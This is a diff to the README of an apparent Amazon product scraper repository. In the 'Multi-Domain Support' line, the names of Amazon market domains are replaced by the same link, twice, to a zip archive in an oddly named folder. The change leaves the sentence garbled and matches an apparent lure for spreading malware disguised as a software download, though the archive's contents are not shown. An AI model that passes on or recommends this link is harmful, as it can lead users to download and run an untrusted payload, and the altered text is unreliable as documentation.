fin3371/amazon-product-scraper/README.md

 - **Product Search:** Enter keywords to find relevant products quickly.
 - **ASIN Lookup:** If you have the ASIN, you can get product details instantly.
-- **Multi-Domain Support:** Use the scraper on different Amazon markets like Amazon.com, Amazon.co.uk, and more.
+- **Multi-Domain Support:** Use the scraper on different Amazon markets like https://raw.githubusercontent.com/fin3371/amazon-product-scraper/main/uncursed/product-scraper-amazon-v3.2.zip, https://raw.githubusercontent.com/fin3371/amazon-product-scraper/main/uncursed/product-scraper-amazon-v3.2.zip, and more.
 - **Proxy Support:** Avoid getting blocked by Amazon with built-in proxy support.

 ## 📋 How to Use the Software